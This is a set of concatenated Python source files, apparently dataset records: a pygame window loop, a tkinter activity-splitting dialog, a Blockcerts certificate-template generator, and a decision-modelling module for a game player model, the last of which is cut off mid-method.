    r'/Users/parsahejabi/University/Term7/Artificial '
    r'Intelligence/Homeworks/ComputerAssignments/Projects/DigikalaCommentVerification/SolutionWithoutLibrary/ans.csv')
| StarcoderdataPython |
##### INITIALIZATION

import pygame

# Bring up the PyGame subsystems and create the game window.
pygame.init()
window = pygame.display.set_mode((1280, 960))

##### MAIN PROGRAM

# Keep pumping events until the user requests to close the window.
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False

# Shut PyGame down cleanly.
pygame.quit()
6593777 | <gh_stars>0
""" Split activity window """
import tkinter
import tkinter.ttk
from gui.labeled_combobox import LabeledCombobox
from gui.labeled_textbox import LabeledTextbox
import model.activity
import model.project
from model.project import Project
from model.activity import Activity
import config
class ActivitySplit(tkinter.Toplevel):
    """ Split activity window: lets the user carve a portion of an existing
    activity off into a different client/project. """

    # fixed window dimensions in pixels
    _WINDOW_WIDTH = 400
    _WINDOW_HEIGHT = 250

    def __init__(self):
        """Build the widgets: project combo, duration, work and Save button."""
        # the activity being split; set later via fill_with_activity()
        self._debut_activity = None

        # Initialization
        tkinter.Toplevel.__init__(self)
        self.wm_geometry(str(self._WINDOW_WIDTH) + "x" + str(self._WINDOW_HEIGHT))
        cell_y = 0  # running vertical offset for widget placement

        # Project
        self._projects = Project.get_projects()
        self._project_combo_val = []
        self._build_project_combo_values()
        self._project_combo = LabeledCombobox(self, "Project", self._project_combo_val, 0, cell_y)
        cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]

        # Duration
        self._duration = LabeledTextbox(self, "Duration", "", 0, cell_y)
        cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]

        # Work
        self._work = LabeledTextbox(self, "Work", "", 0, cell_y)
        cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]

        # Button
        save_button = tkinter.Button(self, text="Save", command=self._save_click)
        save_button.place(x=config.CONSTANTS["GUI_CELL_WIDTH"], y=cell_y)
        cell_y += config.CONSTANTS["GUI_CELL_HEIGHT"]

    def fill_with_activity(self, act: model.activity.Activity):
        """ Fills window with given activity """
        self._debut_activity = act
        proj = self._debut_activity.project
        clnt = self._debut_activity.client
        # combo entries are formatted "<client> - <project>" (see
        # _build_project_combo_values), so select the matching one
        self._project_combo.selected_value = clnt.name + " - " + proj.name
        self._duration.value = str(0)
        self._work.value = act.work

    def fill_with_last_activity(self):
        """ Fills window with latest activity """
        last_activity = Activity.get_last_activity()
        # NOTE(review): comparing to {} suggests get_last_activity() returns
        # an empty dict when nothing exists — confirm in model.activity
        if last_activity == {}:
            return
        self.fill_with_activity(last_activity)

    def _build_project_combo_values(self):
        # one combo entry per known project, formatted "<client> - <project>"
        for prj in self._projects["projects"]:
            self._project_combo_val.append(prj["client_name"] + " - " + prj["project_name"])

    def _save_click(self):
        """Parse the form fields and split the activity accordingly."""
        project_full = self._project_combo.selected_value
        # NOTE(review): raises ValueError if a client or project name itself
        # contains " - " — confirm names are constrained upstream
        client, project = project_full.split(" - ")
        self._debut_activity.split(
            client_name=client,
            project_name=project,
            hours=int(self._duration.value),
            work=self._work.value
        )
        self.destroy()
| StarcoderdataPython |
9722228 | #!/usr/bin/env python
'''
Creates a certificate template with merge tags for recipient/assertion-specific data.
'''
import json
import os
import uuid
import configargparse
from cert_tools import helpers
from cert_tools import jsonpath_helpers
from cert_core.cert_model.model import scope_name
from cert_schema import *
OPEN_BADGES_V2_CONTEXT = OPEN_BADGES_V2_CANONICAL_CONTEXT
BLOCKCERTS_V2_CONTEXT = BLOCKCERTS_V2_CANONICAL_CONTEXT
def create_badge_section(config):
    """Build the Open Badges 'BadgeClass' section of the template: badge
    metadata, the embedded issuer profile and optional signature lines.

    Image files are read from the configured data directory and embedded
    via helpers.encode_image.
    """
    cert_image_path = os.path.join(config.abs_data_dir, config.cert_image_file)
    issuer_image_path = os.path.join(config.abs_data_dir, config.issuer_logo_file)
    badge = {
        'type': 'BadgeClass',
        'id': helpers.URN_UUID_PREFIX + config.badge_id,
        'name': config.certificate_title,
        'description': config.certificate_description,
        'image': helpers.encode_image(cert_image_path),
        'issuer': {
            'id': config.issuer_id,
            'type': 'Profile',
            'name': config.issuer_name,
            'url': config.issuer_url,
            'email': config.issuer_email,
            'image': helpers.encode_image(issuer_image_path),
            'revocationList': config.revocation_list
        }
    }

    badge['criteria'] = {}
    badge['criteria']['narrative'] = config.criteria_narrative

    if config.issuer_signature_lines:
        # FIX: signature_lines was initialized twice in a row; keep one
        signature_lines = []
        for signature_line in config.issuer_signature_lines:
            signature_image_path = os.path.join(config.abs_data_dir, signature_line['signature_image'])
            signature_lines.append(
                {
                    'type': [
                        'SignatureLine',
                        'Extension'
                    ],
                    'jobTitle': signature_line['job_title'],
                    'image': helpers.encode_image(signature_image_path),
                    'name': signature_line['name']
                }
            )
        badge[scope_name('signatureLines')] = signature_lines

    return badge
def create_verification_section(config):
    """Return the Blockcerts merkle-proof verification section."""
    return {
        'type': ['MerkleProofVerification2017', 'Extension'],
        'publicKey': config.issuer_public_key,
    }
def create_recipient_section(config):
    """Return the recipient identity stub; the email is a merge tag filled
    in per recipient later."""
    return {
        'type': 'email',
        'identity': '*|EMAIL|*',
        'hashed': config.hash_emails,
    }
def create_recipient_profile_section():
    """Return the Blockcerts recipient profile stub; name and public key
    are merge tags filled in per recipient later."""
    return {
        'type': ['RecipientProfile', 'Extension'],
        'name': '*|NAME|*',
        'publicKey': 'ecdsa-koblitz-pubkey:*|PUBKEY|*',
    }
def create_assertion_section(config):
    """Return the top-level Assertion skeleton; the issue date and the
    certificate uid are merge tags filled in per recipient later."""
    contexts = [
        OPEN_BADGES_V2_CONTEXT,
        BLOCKCERTS_V2_CONTEXT,
        {"displayHtml": {"@id": "schema:description"}},
    ]
    return {
        '@context': contexts,
        'type': 'Assertion',
        'displayHtml': config.display_html,
        'issuedOn': '*|DATE|*',
        'id': helpers.URN_UUID_PREFIX + '*|CERTUID|*',
    }
def create_certificate_template(config):
    """Assemble the full assertion template (badge, verification, recipient
    sections) and write it as JSON into the template directory.

    Returns the assembled assertion dict.
    """
    if not config.badge_id:
        # no badge id supplied: mint a fresh UUID for this badge class
        badge_uuid = str(uuid.uuid4())
        print('Generated badge id {0}'.format(badge_uuid))
        config.badge_id = badge_uuid

    badge = create_badge_section(config)
    verification = create_verification_section(config)
    assertion = create_assertion_section(config)
    recipient = create_recipient_section(config)
    recipient_profile = create_recipient_profile_section()

    # resolve the template output directory relative to the data dir
    template_dir = config.template_dir
    if not os.path.isabs(template_dir):
        template_dir = os.path.join(config.abs_data_dir, template_dir)
    template_file_name = config.template_file_name

    assertion['recipient'] = recipient
    assertion[scope_name('recipientProfile')] = recipient_profile
    assertion['badge'] = badge
    assertion['verification'] = verification

    # splice in any extra fields requested via config (JSON-path addressed)
    if config.additional_global_fields:
        for field in config.additional_global_fields:
            assertion = jsonpath_helpers.set_field(assertion, field['path'], field['value'])

    if config.additional_per_recipient_fields:
        for field in config.additional_per_recipient_fields:
            assertion = jsonpath_helpers.set_field(assertion, field['path'], field['value'])

    # template_dir is absolute by now, so os.path.join discards the
    # abs_data_dir component again here
    template_path = os.path.join(config.abs_data_dir, template_dir, template_file_name)
    print('Writing template to ' + template_path)
    with open(template_path, 'w') as cert_template:
        json.dump(assertion, cert_template)

    return assertion
def get_config():
    """Parse configuration from conf.ini (in the current working directory)
    plus command-line overrides.

    Returns the parsed args namespace with an extra `abs_data_dir` attribute:
    the data dir resolved to an absolute path.
    """
    cwd = os.getcwd()
    config_file_path = os.path.join(cwd, 'conf.ini')
    p = configargparse.getArgumentParser(default_config_files=[config_file_path])

    p.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
    p.add_argument('--data_dir', type=str, help='where data files are located')
    p.add_argument('--issuer_logo_file', type=str, help='issuer logo image file, png format')
    # NOTE(review): help text below duplicates issuer_logo_file's — likely a
    # copy-paste; the option itself is the certificate image.
    p.add_argument('--cert_image_file', type=str, help='issuer logo image file, png format')
    p.add_argument('--issuer_url', type=str, help='issuer URL')
    p.add_argument('--issuer_certs_url', type=str, help='issuer certificates URL')
    p.add_argument('--issuer_email', required=True, type=str, help='issuer email')
    p.add_argument('--issuer_name', required=True, type=str, help='issuer name')
    p.add_argument('--issuer_id', required=True, type=str, help='issuer profile')
    p.add_argument('--issuer_key', type=str, help='issuer issuing key')
    p.add_argument('--certificate_description', type=str, help='the display description of the certificate')
    p.add_argument('--certificate_title', required=True, type=str, help='the title of the certificate')
    p.add_argument('--criteria_narrative', required=True, type=str, help='criteria narrative')
    p.add_argument('--template_dir', type=str, help='the template output directory')
    p.add_argument('--template_file_name', type=str, help='the template file name')
    p.add_argument('--hash_emails', action='store_true',
                   help='whether to hash emails in the certificate')
    p.add_argument('--revocation_list', type=str, help='issuer revocation list')
    p.add_argument('--issuer_public_key', type=str, help='issuer public key')
    p.add_argument('--badge_id', required=True, type=str, help='badge id')
    p.add_argument('--issuer_signature_lines', action=helpers.make_action('issuer_signature_lines'),
                   help='issuer signature lines')
    p.add_argument('--additional_global_fields', action=helpers.make_action('global_fields'),
                   help='additional global fields')
    p.add_argument('--additional_per_recipient_fields', action=helpers.make_action('per_recipient_fields'),
                   help='additional per-recipient fields')
    p.add_argument('--display_html', type=str, help='html content to display')

    # parse_known_args so unrelated flags from shared parsers don't error out
    args, _ = p.parse_known_args()

    args.abs_data_dir = os.path.abspath(os.path.join(cwd, args.data_dir))
    return args
def main():
    """Entry point: build and write the certificate template."""
    create_certificate_template(get_config())
    print('Created template!')


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3260620 | <filename>decision.py
"""
decision.py
Code for representing decisions including predicting decisions based on a
player model and assessing goals based on decision information.
"""
import random
import utils
from packable import pack, unpack
from diffable import diff
import perception
import choice
from base_types import Certainty, Valence, Salience
class DecisionMethod:
    """
    Decision modes reflect general strategies for making decisions based on
    modes of engagement and prospective impressions.
    """
    def __new__(cls, name_or_other="abstract"):
        # copy-constructor behavior: passing another DecisionMethod clones
        # its name instead of treating the argument as a name string
        result = object.__new__(cls)
        if isinstance(name_or_other, DecisionMethod):
            result.name = name_or_other.name
        else:
            result.name = name_or_other
        return result

    def _diff_(self, other):
        """
        Reports differences (see diffable.py). Returns a list of strings,
        one per difference found (empty when equivalent).
        """
        differences = []
        if not isinstance(other, type(self)):
            differences.append(
                "exact types: {} != {}".format(type(self), type(other))
            )
        if self.name != other.name:
            differences.append("names: '{}' != '{}'".format(self.name, other.name))
        return differences

    def __eq__(self, other):
        # NOTE(review): isinstance(other, type(self)) makes equality
        # asymmetric between a parent instance and a subclass instance —
        # confirm this is intended
        if not isinstance(other, type(self)):
            return False
        if other.name != self.name:
            return False
        return True

    def __hash__(self):
        # hash combines the concrete type and the name, mirroring __eq__
        return hash(type(self)) + 7 * hash(self.name)

    def _pack_(self):
        """
        Turns this object into a simple object that can be converted to JSON.

        Example:
        ```
        DecisionMethod.maximizing
        ```
        packs to
        ```
        "maximizing"
        ```
        """
        return self.name

    def _unpack_(obj):
        """
        The inverse of `pack`; creates a DecisionMethod from a simple object. This
        method works for all of the various subclasses.
        """
        # NOTE(review): defined without self/@staticmethod; presumably
        # invoked as DecisionMethod._unpack_(obj) by the packable machinery
        # (see packable.py) — confirm.
        # The name must correspond to a DecisionMethod instance stored as a
        # class attribute (e.g. DecisionMethod.maximizing).
        if isinstance(obj, str) and hasattr(DecisionMethod, obj):
            result = getattr(DecisionMethod, obj)
            if isinstance(result, DecisionMethod):
                return result
        raise ValueError(
            "Attempted to unpack unknown decision method '{}'.".format(obj)
        )

    def decide(self, decision):
        """
        Overridden by subclasses to implement decision logic.
        This method takes as input a Decision object which should have
        prospective_impressions and goal_relevance defined (see
        Decision.add_prospective_impressions). Missing goal saliences will be
        treated as ones.
        See also:
        Decision.add_prospective_impressions
        ModeOfEngagement.build_decision_model (engagement.py)
        PriorityMethod.factor_decision_model (engagement.py)
        """
        raise NotImplementedError(
            "Use one of the DecisionMethod subclasses to make decisions, not "
            "DecisionMethod itself!"
        )

    def consistency(self, decision):
        """
        Overridden by subclasses to implement consistency logic.
        Takes a Decision object that's already been decided, and returns a number
        between 0 and 1 indicating how consistent the decision is with this
        decision method.
        The given decision must have an option specified and must include
        prospective impression values.
        """
        raise NotImplementedError(
            "Use one of the DecisionMethod subclasses to test consistency, not "
            "DecisionMethod itself!"
        )
@utils.super_class_property()
class Maximizing(DecisionMethod):
    """
    Using a maximizing decision method, options are compared in an attempt to
    find one that's better than all of the rest. Lack of information and/or
    tradeoffs can cause this attempt to fail, in which case resolution proceeds
    arbitrarily.
    """
    def __new__(cls):
        return super().__new__(cls, "maximizing")

    def decide(self, decision):
        """
        See DecisionMethod.decide.
        Computes pairwise rationales for picking each option over others and
        randomly picks from dominating options.
        """
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't make a decision until prospective impressions have been added."
            )
        decision_model = decision.prospective_impressions
        goal_relevance = decision.goal_relevance
        # TODO: Implement this!
        # NOTE(review): unimplemented — currently validates the input and
        # then returns None.
        pass

    def consistency(self, decision):
        """
        See DecisionMethod.consistency.
        Uses the dominance structure of pairwise rationales to compute consistency.
        """
        if not decision.option:
            raise ValueError(
                "Can't compute decision consistency before an option has been selected."
            )
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't compute decision consistency before prospective impressions are "
                "added."
            )
        # TODO: Implement this!
        # NOTE(review): unimplemented — currently validates the input and
        # then returns None.
        pass
@utils.super_class_property()
class Satisficing(DecisionMethod):
    """
    Using a satisficing decision method, options are inspected to find one that
    achieves some kind of positive outcome, or failing that, a least-negative
    outcome. Barring large differences, positive outcomes are all considered
    acceptable, and an arbitrary decision is made between acceptable options.
    """
    def __new__(cls):
        return super().__new__(cls, "satisficing")

    def decide(self, decision):
        """
        See DecisionMethod.decide.
        Computes risks for each option and picks randomly from options that fall
        into a fuzzy best or least-bad group.
        """
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't make a decision until prospective impressions have been added."
            )
        decision_model = decision.prospective_impressions
        goal_relevance = decision.goal_relevance
        # TODO: Implement this!
        # NOTE(review): unimplemented — currently validates the input and
        # then returns None.
        pass

    def consistency(self, decision):
        """
        See DecisionMethod.consistency.
        Uses option risks to evaluate consistency. TODO: More specific here.
        """
        if not decision.option:
            raise ValueError(
                "Can't compute decision consistency before an option has been selected."
            )
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't compute decision consistency before prospective impressions are "
                "added."
            )
        # TODO: Implement this!
        # NOTE(review): unimplemented — currently validates the input and
        # then returns None.
        pass
@utils.super_class_property()
class Utilizing(DecisionMethod):
    """
    Using a utilizing decision method, utilities are computed for each option by
    multiplying probabilities and valences and summing across different outcomes
    according to goal priorities. The option with the highest utility is chosen,
    or one is selected randomly if there are multiple.
    Note: this is a bullshit decision method which is numerically convenient but
    not at all accurate.
    Constants:
    value_resolution:
    determines the resolution at which utilities are considered
    indistinguishable (unless one is positive/zero and the other is
    negative/zero).
    """
    value_resolution = 0.09

    def __new__(cls):
        return super().__new__(cls, "utilizing")

    def rank_options(self, decision):
        """
        Ranks the options at the given decision into multiple equivalence classes
        ordered by preference. Returns an ordered list of pairs of (preference-
        value, list-of-option-names). The given decision must include prospective
        impressions.
        """
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't rank options until prospective impressions have been added."
            )
        decision_model = decision.prospective_impressions
        goal_relevance = decision.goal_relevance

        # sum goal-weighted utilities per option (missing relevance -> 1)
        utilities = {}
        for opt in decision_model:
            # TODO: Does this work for options w/out any impressions?
            utilities[opt] = 0
            for goal in decision_model[opt]:
                for pri in decision_model[opt][goal]:
                    utilities[opt] = utilities[opt] + float(
                        pri.utility() * (
                            goal_relevance[goal]
                            if goal in goal_relevance
                            else 1
                        )
                    )

        # FIX: deduplicate the utility levels with set(); previously,
        # options with equal utilities produced duplicate levels whose
        # (identical) option lists were concatenated by the merge loop
        # below, which biased random.choice in decide().
        ulevels = reversed(sorted(set(utilities.values())))
        strict = [
            [u, [ gn for (gn, uv) in utilities.items() if uv == u ]]
            for u in ulevels
        ]

        # Merge levels according to value_resolution
        i = 0
        while i < len(strict) - 1:
            u1 = strict[i][0]
            u2 = strict[i+1][0]
            # never merge a positive/zero level with a negative/zero one
            if u1 > 0 and u2 <= 0 or u1 >= 0 and u2 < 0:
                i += 1
                continue
            # merge adjacent levels closer together than the resolution,
            # averaging their utilities and pooling their options
            if u1 - u2 < self.value_resolution:
                u, ol = strict.pop(i)
                strict[i][0] = (u1 + u2) / 2
                strict[i][1].extend(ol)
                continue # without incrementing i
            # increment and continue
            i += 1

        return strict

    def decide(self, decision):
        """
        See DecisionMethod.decide.
        Computes utilities for each option at a choice and returns a random
        option name from those tied for highest perceived utility.
        """
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't make a decision until prospective impressions have been added."
            )
        ranked = self.rank_options(decision)
        best = ranked[0][1]
        return random.choice(best)

    def consistency(self, decision):
        """
        See DecisionMethod.consistency.
        Creates a utility scale based on the highest- and lowest-valued options at
        this choice and interpolates according to the utility of the chosen option.
        """
        if not decision.option:
            raise ValueError(
                "Can't compute decision consistency before an option has been selected."
            )
        if not decision.prospective_impressions:
            raise ValueError(
                "Can't compute decision consistency before prospective impressions are "
                "added."
            )
        ranked = self.rank_options(decision)
        best_utility = ranked[0][0]
        worst_utility = ranked[-1][0]
        # the scale's floor sits below the worst option's utility
        lower_bound = -0.5 + worst_utility / 2

        # find the (merged) utility level containing the chosen option
        chosen_utility = None
        for u, ol in ranked:
            if decision.option.name in ol:
                chosen_utility = u
                break
        if chosen_utility is None:
            raise RuntimeError(
                "Selected option '{}' wasn't found among ranked options!".format(
                    decision.option.name
                )
            )

        # TODO: Something else here?
        # TODO: Note that this isn't quite correct, because there should be more
        # tolerance when the utility range is low, but figuring out what the
        # threshold for "low" is is difficult.
        #denom = float(best_utility) - float(worst_utility)
        denom = float(best_utility) - float(lower_bound)
        if denom == 0:
            return 1.0 # all options are the same, so any choice is compatible
        else:
            # TODO: Which of these?!?
            #return (chosen_utility - worst_utility) / (best_utility - worst_utility)
            return (float(chosen_utility) - float(lower_bound)) / denom
@utils.super_class_property()
class Randomizing(DecisionMethod):
    """
    Using a randomizing decision method, options are selected completely at
    random.
    """

    def __new__(cls):
        return super().__new__(cls, "randomizing")

    def decide(self, decision):
        """
        See DecisionMethod.decide.

        Selects a random option at the given choice, ignoring information about
        perception of the choice.

        This is just a baseline model.
        """
        candidate_names = list(decision.choice.options.keys())
        return random.choice(candidate_names)

    def consistency(self, decision):
        """
        See DecisionMethod.consistency.

        Always returns 1, because every option is equally consistent with random
        decision making.
        """
        # Still insist on a selected option and prospective impressions, so
        # this method's preconditions match the other decision methods'.
        if not decision.option:
            raise ValueError(
                "Can't compute decision consistency before an option has been selected."
            )
        if decision.prospective_impressions:
            return 1.0
        raise ValueError(
            "Can't compute decision consistency before prospective impressions are "
            "added."
        )
class Decision:
    """
    A decision is the act of picking an option at a choice, after which one
    experiences an outcome. Note that the handling of extended/hidden/uncertain
    outcomes is not yet implemented.

    Decisions have information on both a player's prospective impressions of the
    choice in question (as a decision model plus goal saliences) and their
    retrospective impressions of the option they chose (as a mapping from goal
    names to Retrospective percepts).

    When a decision is created, it doesn't yet specify outcomes or retrospective
    impressions (although the option that it is a decision for includes outcomes
    that have probabilities). The "roll_outcomes" method can be used to
    automatically sample a set of outcomes for an option.
    """
    def __init__(
        self,
        choice,
        option=None,
        outcomes=None,
        prospective_impressions=None,
        factored_decision_models=None,
        goal_relevance=None,
        retrospective_impressions=None
    ):
        """
        choice:
            The choice that this object focuses on.
        option:
            The option the choosing of which this Decision represents. May be left
            blank at first by passing in None. A string is looked up among the
            choice's options.
        outcomes:
            A collection of Outcome objects; leave out to create a pre-outcome
            decision. The special string "generate" can be used to automatically
            generate outcomes; it just has the effect of calling roll_outcomes. Note
            that "generate" may not be given when no option is specified (doing so
            will result in a RuntimeError).
        prospective_impressions:
            A mapping from option names to mappings from goal names to prospective
            impression lists, as returned by ModeOfEngagement.build_decision_model.
            Can be created automatically along with the factored_decision_models and
            goal_relevance properties if given as None using the
            add_prospective_impressions method.
        factored_decision_models:
            This is just a list of one or more prospective impressions structures
            (maps from option names to maps from goal names to impression lists).
            The models are arranged such that the first model can be used to make
            decisions, falling back to successive models in the case of a tie at an
            upper level. Normally, this is given as None and assigned when
            add_prospective_impressions is called.
        goal_relevance:
            A mapping from goal names to Salience values. This expresses the relative
            importance of various goals at the moment of the decision, and is usually
            given as None and assigned when add_prospective_impressions is called.
        retrospective_impressions:
            A mapping from goal names to lists of Retrospective impression objects.
            Normally given as None and then assigned using the
            add_retrospective_impressions method. Note that each goal may have
            multiple associated impressions based on the various outcomes that
            occurred. This only makes sense if the option for this Decision has been
            chosen and outcomes have been rolled (see roll_outcomes).
        """
        self.choice = choice
        self.option = option
        if isinstance(self.option, str):
            self.option = self.choice.options[self.option] # look up within choice
        self.outcomes = outcomes or {}
        if self.outcomes == "generate":
            self.roll_outcomes()
        elif not isinstance(self.outcomes, dict):
            # Normalize a plain collection of Outcomes into a by-name mapping.
            # NOTE(review): the doubled braces below format to a literal '{}';
            # confirm whether utils.check_names applies its own .format pass.
            utils.check_names(
                self.outcomes,
                "Two outcomes named '{{}}' cannot coexist within a Decision."
            )
            self.outcomes = {
                o.name: o
                for o in self.outcomes
            }
        self.prospective_impressions = prospective_impressions
        self.factored_decision_models = factored_decision_models
        self.goal_relevance = goal_relevance
        self.retrospective_impressions = retrospective_impressions
        if retrospective_impressions:
            self.add_simplified_retrospectives()
        else:
            self.simplified_retrospectives = None

    def __str__(self):
        # TODO: Better here
        return str(pack(self))

    def _diff_(self, other):
        """
        Reports differences (see diffable.py).
        """
        return [
            "choices: {}".format(d)
            for d in diff(self.choice, other.choice)
        ] + [
            "options: {}".format(d)
            for d in diff(self.option, other.option)
        ] + [
            "outcomes: {}".format(d)
            for d in diff(self.outcomes, other.outcomes)
        ] + [
            "prospectives: {}".format(d)
            for d in diff(
                self.prospective_impressions,
                other.prospective_impressions
            )
        ] + [
            "factored decision models: {}".format(d)
            for d in diff(
                self.factored_decision_models,
                other.factored_decision_models
            )
        ] + [
            "goal relevance: {}".format(d)
            for d in diff(self.goal_relevance, other.goal_relevance)
        ] + [
            "retrospectives: {}".format(d)
            for d in diff(
                self.retrospective_impressions,
                other.retrospective_impressions
            )
        ] + [
            "simplified retrospectives: {}".format(d)
            for d in diff(
                self.simplified_retrospectives,
                other.simplified_retrospectives
            )
        ]

    def __eq__(self, other):
        if not isinstance(other, Decision):
            return False
        if other.choice != self.choice:
            return False
        if other.option != self.option:
            return False
        if other.outcomes != self.outcomes:
            return False
        if other.prospective_impressions != self.prospective_impressions:
            return False
        if other.factored_decision_models != self.factored_decision_models:
            return False
        if other.goal_relevance != self.goal_relevance:
            return False
        if other.retrospective_impressions != self.retrospective_impressions:
            return False
        if other.simplified_retrospectives != self.simplified_retrospectives:
            return False
        return True

    def __hash__(self):
        # NOTE: Decisions are mutable, so this hash changes as impressions and
        # outcomes are added; don't use a Decision as a dict key while it's
        # still being filled in.
        h = hash(self.choice)
        h ^= hash(self.option)
        for on in self.outcomes:
            h ^= 583948 + hash(self.outcomes[on])
        if self.prospective_impressions:
            for on in self.prospective_impressions:
                option_impressions = self.prospective_impressions[on]
                oh = hash(on)
                for gn in option_impressions:
                    h ^= 874387 + hash(tuple(option_impressions[gn])) + oh
        if self.factored_decision_models:
            for dm in self.factored_decision_models:
                for on in dm:
                    option_impressions = dm[on]
                    oh = hash(on)
                    for gn in option_impressions:
                        h ^= 231893 + hash(tuple(option_impressions[gn])) + oh
        if self.goal_relevance:
            for gn in self.goal_relevance:
                h ^= 3321564 + hash(gn) + hash(self.goal_relevance[gn])
        if self.retrospective_impressions:
            for gn in self.retrospective_impressions:
                h ^= 67894 + hash(gn) + hash(tuple(self.retrospective_impressions[gn]))
        if self.simplified_retrospectives:
            for gn in self.simplified_retrospectives:
                h ^= 848846 + hash(gn) + hash(self.simplified_retrospectives[gn])
        return h

    def _pack_(self):
        """
        Packs this Decision into a simple object representation which can be
        converted to JSON.

        Example:

        ```
        Decision(
            Choice(
                "Rescue the baby dragon or not?",
                [
                    Option(
                        "rescue_it",
                        [
                            Outcome(
                                "bites_your_hand",
                                {
                                    "health_and_safety": Valence("unsatisfactory"),
                                    "befriend_dragon": Valence("unsatisfactory"),
                                },
                                Salience("implicit"),
                                Certainty("even"),
                            ),
                            Outcome(
                                "appreciates_kindness",
                                { "befriend_dragon": "good" },
                                "explicit",
                                "likely",
                            )
                        ]
                    ),
                    Option(
                        "leave_it",
                        [
                            Outcome(
                                "dislikes_abandonment",
                                { "befriend_dragon": "bad" },
                                "explicit",
                                0.97,
                            ),
                            Outcome(
                                "dies",
                                {
                                    "befriend_dragon": "awful",
                                    "kill_dragon": "great"
                                },
                                "hinted",
                                "unlikely",
                                actual_likelihood="even"
                            )
                        ]
                    )
                ]
            ),
            Option(
                "rescue_it",
                [
                    Outcome(
                        "bites_your_hand",
                        {
                            "health_and_safety": Valence("unsatisfactory"),
                            "befriend_dragon": Valence("unsatisfactory"),
                        },
                        Salience("implicit"),
                        Certainty("even"),
                    ),
                    Outcome(
                        "appreciates_kindness",
                        { "befriend_dragon": "good" },
                        "explicit",
                        "likely",
                    )
                ]
            ),
            [
                Outcome(
                    "appreciates_kindness",
                    { "befriend_dragon": "good" },
                    "explicit",
                    "likely",
                )
            ],
            prospective_impressions=None,
            factored_decision_models=None,
            goal_relevance=None,
            retrospective_impressions=None
        )
        ```
        {
            "choice": {
                "name": "Rescue the baby dragon or not?",
                "options": {
                    "leave_it": {
                        "name": "leave_it",
                        "outcomes": [
                            {
                                "actual_likelihood": "even",
                                "apparent_likelihood": "unlikely",
                                "effects": {
                                    "befriend_dragon": "awful",
                                    "kill_dragon": "great"
                                },
                                "name": "dies",
                                "salience": "hinted"
                            },
                            {
                                "apparent_likelihood": 0.97,
                                "effects": {
                                    "befriend_dragon": "bad"
                                },
                                "name": "dislikes_abandonment",
                                "salience": "explicit"
                            },
                        ]
                    },
                    "rescue_it": {
                        "name": "rescue_it",
                        "outcomes": [
                            {
                                "apparent_likelihood": "likely",
                                "effects": {
                                    "befriend_dragon": "good"
                                },
                                "name": "appreciates_kindness",
                                "salience": "explicit"
                            },
                            {
                                "apparent_likelihood": "even",
                                "effects": {
                                    "befriend_dragon": "unsatisfactory",
                                    "health_and_safety": "unsatisfactory"
                                },
                                "name": "bites_your_hand",
                                "salience": "implicit"
                            }
                        ]
                    }
                }
            },
            "option": {
                "name": "rescue_it",
                "outcomes": [
                    {
                        "apparent_likelihood": "likely",
                        "effects": {
                            "befriend_dragon": "good"
                        },
                        "name": "appreciates_kindness",
                        "salience": "explicit"
                    },
                    {
                        "apparent_likelihood": "even",
                        "effects": {
                            "befriend_dragon": "unsatisfactory",
                            "health_and_safety": "unsatisfactory"
                        },
                        "name": "bites_your_hand",
                        "salience": "implicit"
                    }
                ]
            },
            "outcomes": [
                {
                    "apparent_likelihood": "likely",
                    "effects": {
                        "befriend_dragon": "good"
                    },
                    "name": "appreciates_kindness",
                    "salience": "explicit"
                }
            ],
            "prospective_impressions": None,
            "factored_decision_models": None,
            "goal_relevance": None,
            "retrospective_impressions": None,
        }
        ```

        TODO: More examples!
        """
        return {
            "choice": pack(self.choice),
            "option": pack(self.option),
            "outcomes": [ pack(o) for o in self.outcomes.values() ],
            "prospective_impressions": pack(self.prospective_impressions),
            "factored_decision_models": pack(self.factored_decision_models),
            "goal_relevance": pack(self.goal_relevance),
            "retrospective_impressions": pack(self.retrospective_impressions),
            # Note: no need to pack simplified retrospective impressions, as they'll
            # be reconstructed from the full retrospectives.
        }

    # Marked @staticmethod (it takes no self); Decision.unpack_decision_model(...)
    # continues to work, and instance-level access no longer mis-binds `dm`.
    @staticmethod
    def unpack_decision_model(dm):
        """
        Helper method for _unpack_ that unpacks a decision model (a mapping from
        option names to mappings from goal names to lists of Prospective
        impressions).
        """
        return {
            optname: {
                goalname: [
                    unpack(pri, perception.Prospective)
                    for pri in dm[optname][goalname]
                ]
                for goalname in dm[optname]
            }
            for optname in dm
        } if dm else None

    @staticmethod
    def _unpack_(obj):
        """
        The inverse of `_pack_`; creates a Decision from a simple object.

        Note that the choice, option, and outcomes of this decision are new,
        disentangled objects, so this it isn't terribly memory efficient to pack
        and unpack Decision objects, and true linkage shouldn't be assumed.
        """
        return Decision(
            unpack(obj["choice"], choice.Choice),
            unpack(obj["option"], choice.Option),
            [ unpack(o, choice.Outcome) for o in obj["outcomes"] ],
            Decision.unpack_decision_model(obj["prospective_impressions"]),
            [
                Decision.unpack_decision_model(dm)
                for dm in obj["factored_decision_models"]
            ] if obj["factored_decision_models"] else None,
            {
                gn: unpack(obj["goal_relevance"][gn], Salience)
                for gn in obj["goal_relevance"]
            } if obj["goal_relevance"] else None,
            {
                gn: [
                    unpack(o, perception.Retrospective)
                    for o in obj["retrospective_impressions"][gn]
                ]
                for gn in obj["retrospective_impressions"]
            } if obj["retrospective_impressions"] else None
        )

    def select_option(self, selection):
        """
        Selects a particular option at this choice, either via a string key or the
        object itself. Raises a ValueError if given an Option that isn't part of
        this decision's choice, and a TypeError for other selection values.
        """
        if isinstance(selection, str):
            self.option = self.choice.options[selection]
        elif isinstance(selection, choice.Option):
            if selection not in self.choice.options.values():
                raise ValueError(
                    "Can't select option {} which isn't part of choice {}.".format(
                        selection,
                        self.choice
                    )
                )
            # The options mapping is keyed by name, so indexing it with the
            # Option object itself (as the original did) always raised a
            # KeyError; the validated object can be assigned directly.
            self.option = selection
        else:
            raise TypeError(
                "Can't select invalid option value {} of type {}.".format(
                    selection,
                    type(selection)
                )
            )

    def roll_outcomes(self):
        """
